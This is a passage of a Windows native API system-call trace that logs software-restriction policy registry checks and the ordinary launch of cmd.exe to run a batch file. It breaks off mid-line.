01207 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01208 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01209 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01210 896 NtClose (68, ... ) == 0x0 01211 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01212 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01213 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01214 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01215 896 NtClose (68, ... ) == 0x0 01216 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01217 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01218 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01219 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01220 896 NtClose (68, ... ) == 0x0 01221 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01222 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01223 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01224 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01225 896 NtClose (68, ... ) == 0x0 01226 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01227 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01228 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01229 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01230 896 NtClose (68, ... ) == 0x0 01231 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01232 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01233 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01234 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01235 896 NtClose (68, ... ) == 0x0 01236 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01237 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01238 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01239 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01240 896 NtClose (68, ... ) == 0x0 01241 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01242 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01243 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01244 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01245 896 NtClose (68, ... ) == 0x0 01246 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01247 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01248 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01249 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01250 896 NtClose (68, ... ) == 0x0 01251 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01252 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01253 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01254 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01255 896 NtClose (68, ... ) == 0x0 01256 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01257 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 68, ) }, ... 68, ) == 0x0 01258 896 NtQueryValueKey (68, (68, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) , Full, 524, ... TitleIdx=0, Type=4, Name= (68, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) , Data= (68, "DefaultLevel", Full, 524, ... TitleIdx=0, Type=4, Name="DefaultLevel", Data="\0\0\4\0"}, 48, ) }, 48, ) == 0x0 01259 896 NtClose (68, ... ) == 0x0 01260 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01261 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01262 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01263 896 NtClose (68, ... ) == 0x0 01264 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01265 896 NtOpenThreadToken (-2, 0x8, 0, ... ) == STATUS_NO_TOKEN 01266 896 NtOpenProcessToken (-1, 0xa, ... 68, ) == 0x0 01267 896 NtDuplicateToken (68, 0xc, {24, 0, 0x0, 0, 1232104, 0x0}, 0, 2, ... 72, ) == 0x0 01268 896 NtClose (68, ... ) == 0x0 01269 896 NtAccessCheck (1343008, 72, 0x1, 1232180, 1232232, 56, 1232212, ... (0x1), ) == 0x0 01270 896 NtClose (72, ... ) == 0x0 01271 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 72, ) }, ... 72, ) == 0x0 01272 896 NtQueryValueKey (72, (72, "PolicyScope", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (72, "PolicyScope", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01273 896 NtClose (72, ... ) == 0x0 01274 896 NtOpenSymbolicLinkObject (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\??\C:"}, ... 72, ) }, ... 72, ) == 0x0 01275 896 NtQuerySymbolicLinkObject (72, ... (72, ... "\Device\HarddiskVolume1", 48, ) , 48, ) == 0x0 01276 896 NtClose (72, ... ) == 0x0 01277 896 NtQueryVolumeInformationFile (52, 1229936, 8, Device, ... {status=0x0, info=8}, ) == 0x0 01278 896 NtQueryInformationFile (52, 1230052, 528, Name, ... {status=0x0, info=16}, ) == 0x0 01279 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 01280 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 01281 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\a.bat"}, 1229132, ... ) }, 1229132, ... ) == 0x0 01282 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 72, {status=0x0, info=1}, ) }, 3, 16417, ... 72, {status=0x0, info=1}, ) == 0x0 01283 896 NtQueryDirectoryFile (72, 0, 0, 0, 1228560, 616, BothDirectory, 1, (72, 0, 0, 0, 1228560, 616, BothDirectory, 1, "a.bat", 0, ... {status=0x0, info=104}, ) , 0, ... {status=0x0, info=104}, ) == 0x0 01284 896 NtClose (72, ... ) == 0x0 01285 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 01286 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 01287 896 NtQueryInformationFile (52, 1232092, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 01288 896 NtCreateSection (0xf0005, 0x0, {5894, 0}, 2, 134217728, 52, ... 72, ) == 0x0 01289 896 NtMapViewOfSection (72, -1, (0x0), 0, 0, {0, 0}, 5894, 1, 0, 2, ... (0xae0000), {0, 0}, 8192, ) == 0x0 01290 896 NtClose (72, ... ) == 0x0 01291 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01292 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 72, ) == 0x0 01293 896 NtQueryInformationToken (72, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01294 896 NtClose (72, ... ) == 0x0 01295 896 NtOpenKey (0x20019, {24, 0, 0x640, 0, 0, (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 72, ) }, ... 72, ) == 0x0 01296 896 NtOpenKey (0x20019, {24, 72, 0x40, 0, 0, (0x20019, {24, 72, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, ... 68, ) }, ... 68, ) == 0x0 01297 896 NtClose (72, ... ) == 0x0 01298 896 NtQueryValueKey (68, (68, "Cache", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 01299 896 NtQueryValueKey (68, (68, "Cache", Partial, 174, ... TitleIdx=0, Type=1, Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 174, ) , Partial, 174, ... TitleIdx=0, Type=1, Data= (68, "Cache", Partial, 174, ... TitleIdx=0, Type=1, Data="C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 174, ) }, 174, ) == 0x0 01300 896 NtClose (68, ... ) == 0x0 01301 896 NtUnmapViewOfSection (-1, 0xae0000, ... ) == 0x0 01302 896 NtAllocateVirtualMemory (-1, 0, 0, 4096, 8192, 4, ... 11403264, 4096, ) == 0x0 01303 896 NtAllocateVirtualMemory (-1, 11403264, 0, 4096, 4096, 4, ... 11403264, 4096, ) == 0x0 01304 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 68, ) }, ... 68, ) == 0x0 01305 896 NtQueryValueKey (68, (68, "LogFileName", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01306 896 NtClose (68, ... ) == 0x0 01307 896 NtOpenKey (0x3, {24, 0, 0x40, 0, 0, (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01308 896 NtQueryInformationToken (64, User, 128, ... {token info, class 1, size 36}, 36, ) == 0x0 01309 896 NtQueryInformationToken (64, 15, 4, ... {token info, class 15, size 4}, 4, ) == 0x0 01310 896 NtClose (64, ... ) == 0x0 01311 896 NtClose (52, ... ) == 0x0 01312 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\cmd.exe"}, 1232208, ... ) }, 1232208, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01313 896 NtQueryAttributesFile ({24, 12, 0x40, 0, 0, ({24, 12, 0x40, 0, 0, "cmd.exe"}, 1232208, ... ) }, 1232208, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01314 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe"}, 1232208, ... ) }, 1232208, ... ) == 0x0 01315 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe"}, 1232968, ... ) }, 1232968, ... ) == 0x0 01316 896 NtOpenFile (0x1000a1, {24, 0, 0x40, 0, 0, (0x1000a1, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe"}, 5, 96, ... 52, {status=0x0, info=1}, ) }, 5, 96, ... 52, {status=0x0, info=1}, ) == 0x0 01317 896 NtCreateSection (0xf001f, 0x0, 0x0, 16, 16777216, 52, ... 64, ) == 0x0 01318 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01319 896 NtQuerySection (64, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 01320 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01321 896 NtQuerySystemInformation (71, 4, ... {system info, class 71, size 4}, 0x0, ) == 0x0 01322 896 NtCreateProcessEx (1234016, 2035711, 0, -1, 4, 64, 0, 0, 0, ... ) == 0x0 01323 896 NtSetInformationProcess (68, PriorityClass, {process info, class 18, size 2}, 512, ... ) == 0x0 01324 896 NtAllocateVirtualMemory (-1, 1343488, 0, 4096, 4096, 4, ... 1343488, 4096, ) == 0x0 01325 896 NtQueryInformationProcess (68, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffd7000,AffinityMask=0x1,BasePriority=8,Pid=2016,ParentPid=1252,}, 0x0, ) == 0x0 01326 896 NtReadVirtualMemory (68, 0x7ffd7008, 4, ... (68, 0x7ffd7008, 4, ... "\0\0\320J", 0x0, ) , 0x0, ) == 0x0 01327 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\cmd.exe.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01328 896 NtAllocateVirtualMemory (-1, 1347584, 0, 8192, 4096, 4, ... 1347584, 8192, ) == 0x0 01329 896 NtReadVirtualMemory (68, 0x4ad00000, 4096, ... (68, 0x4ad00000, 4096, ... "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\330\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\35\355\325\352Y\214\273\271Y\214\273\271Y\214\273\271\232\203\264\271_\214\273\271Y\214\272\271\200\214\273\271\232\203\346\271^\214\273\271\346\203\333\271[\214\273\271\232\203\345\271X\214\273\271\232\203\344\271m\214\273\271\232\203\341\271X\214\273\271RichY\214\273\271\0\0\0\0\0\0\0\0PE\0\0L\1\3\0\276~\20A\0\0\0\0\0\0\0\0\340\0\17\1\13\1\7\12\0\366\1\0\0\366\3\0\0\0\0\0VP\0\0\0\20\0\0\0\360\1\0\0\0\320J\0\20\0\0\0\2\0\0\5\0\1\0\5\0\1\0\4\0\0\0\0\0\0\0\0\20\6\0\0\4\0\0\224$\6\0\3\0\0\200\0\0\20\0\0\0\20\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0\0\366\1\0P\0\0\0\0\340\3\0\260(\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\5\2\08\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\223\1\0H\0\0\0H\2\0\0X\0\0\0\0\20\0\0\0\3\0\0\340\362\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0\340\365\1\0\0\20\0\0\0\366\1\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 4096, ) , 4096, ) == 0x0 01330 896 NtReadVirtualMemory (68, 0x4ad3e000, 256, ... (68, 0x4ad3e000, 256, ... "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\3\0\0\00\0\0\200\13\0\0\0\200\0\0\200\16\0\0\0\230\0\0\200\20\0\0\0\260\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\1\0\0\0\310\0\0\200\2\0\0\0\340\0\0\200\3\0\0\0\370\0\0\200\4\0\0\0\20\1\0\200\5\0\0\0(\1\0\200\6\0\0\0@\1\0\200\7\0\0\0X\1\0\200\10\0\0\0p\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\1\0\0\0\210\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\200\2\0\200\240\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\1\0\0\0\270\1\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0\320\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\11\4\0\0\340\1\0\0\0\0\0\0\0\0\0\0", 256, ) , 256, ) == 0x0 01331 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01332 896 NtQueryInformationProcess (68, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffd7000,AffinityMask=0x1,BasePriority=8,Pid=2016,ParentPid=1252,}, 0x0, ) == 0x0 01333 896 NtAllocateVirtualMemory (-1, 0, 0, 2372, 4096, 4, ... 11468800, 4096, ) == 0x0 01334 896 NtAllocateVirtualMemory (68, 0, 0, 6432, 4096, 4, ... 65536, 8192, ) == 0x0 01335 896 NtWriteVirtualMemory (68, 0x10000, (68, 0x10000, "=\0A\0:\0=\0A\0:\0\\0\0\0=\0C\0:\0=\0C\0:\0\\0s\0c\0r\0i\0p\0t\0s\0\0\0=\0U\0:\0=\0U\0:\0\\0\0\0A\0L\0L\0U\0S\0E\0R\0S\0P\0R\0O\0F\0I\0L\0E\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0A\0P\0P\0D\0A\0T\0A\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0R\0O\0O\0T\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0L\0I\0B\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\0", 6432, ... 0x0, ) , 6432, ... 0x0, ) == 0x0 01336 896 NtAllocateVirtualMemory (68, 0, 0, 2372, 4096, 4, ... 131072, 4096, ) == 0x0 01337 896 NtWriteVirtualMemory (68, 0x20000, (68, 0x20000, "\0\20\0\0D\11\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\10\2\220\2\0\0\17\0\0\0\364\3\366\3\230\4\0\06\08\0\220\10\0\0\36\0 \0\310\10\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\06\08\0\350\10\0\0\36\0 \0 \11\0\0\0\0\2\0@\11\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 2372, ... 0x0, ) , 2372, ... 0x0, ) == 0x0 01338 896 NtWriteVirtualMemory (68, 0x7ffd7010, (68, 0x7ffd7010, "\0\0\2\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0 01339 896 NtWriteVirtualMemory (68, 0x7ffd71e8, (68, 0x7ffd71e8, "\0\0\0\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0 01340 896 NtFreeVirtualMemory (-1, (0xaf0000), 0, 32768, ... (0xaf0000), 4096, ) == 0x0 01341 896 NtAllocateVirtualMemory (68, 0, 0, 1048576, 8192, 4, ... 196608, 1048576, ) == 0x0 01342 896 NtAllocateVirtualMemory (68, 196608, 0, 1048576, 4096, 4, ... 196608, 1048576, ) == 0x0 01343 896 NtCreateThread (0x1f03ff, 0x0, 68, 1234024, 1233688, 1, ... 72, {2016, 596}, ) == 0x0 01344 896 NtRequestWaitReplyPort (24, {168, 196, new_msg, 0, 0, 0, 0, 0} (24, {168, 196, new_msg, 0, 0, 0, 0, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0D\0\0\0H\0\0\0\340\7\0\0T\2\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0E\11\221|\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0p\375\177\0\0\0\0\0\0\0\0\2\0\0\0" ... {168, 196, reply, 0, 1252, 896, 81837, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0D\0\0\0H\0\0\0\340\7\0\0T\2\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0E\11\221|\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0p\375\177\0\0\0\0\0\0\0\0\2\0\0\0" ) ... {168, 196, reply, 0, 1252, 896, 81837, 0} (24, {168, 196, new_msg, 0, 0, 0, 0, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0D\0\0\0H\0\0\0\340\7\0\0T\2\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0E\11\221|\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0p\375\177\0\0\0\0\0\0\0\0\2\0\0\0" ... {168, 196, reply, 0, 1252, 896, 81837, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0D\0\0\0H\0\0\0\340\7\0\0T\2\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0\0\0E\11\221|\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0p\375\177\0\0\0\0\0\0\0\0\2\0\0\0" ) ) == 0x0 01345 896 NtResumeThread (72, ... 1, ) == 0x0 01346 896 NtClose (52, ... ) == 0x0 01347 896 NtClose (64, ... ) == 0x0 01348 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\USER32.dll"}, 1239736, ... ) }, 1239736, ... ) == 0x0 01349 896 NtQueryAttributesFile ({24, 0, 0x40, 